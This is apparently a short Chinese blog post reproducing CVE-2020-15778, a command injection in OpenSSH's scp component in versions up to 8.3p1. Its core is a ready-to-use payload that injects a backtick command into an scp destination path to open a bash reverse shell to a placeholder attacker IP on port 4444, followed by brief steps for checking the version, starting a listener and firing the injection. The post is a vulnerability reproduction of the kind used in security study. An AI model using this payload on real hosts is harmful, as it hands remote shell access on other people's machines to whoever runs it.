CVE-2020-15778漏洞复现

产品:Openssh

影响的组件:SCP

漏洞版本:<= openssh-8.3p1

scp命令引发的命令注入

反弹shell的payload

scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt'

实战测试,这里使用本机进行测试

1、查看ssh版本,符合漏洞版本

ssh -V

2、先在本地新建好文件,用于上传

2、本地开启监听

3、使用scp命令注入成功反弹shell

 

参考文章:

https://github.com/cpandya2909/CVE-2020-15778/#vulnerability-title-scp-in-openssh-83p1-allows-eval-injection

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页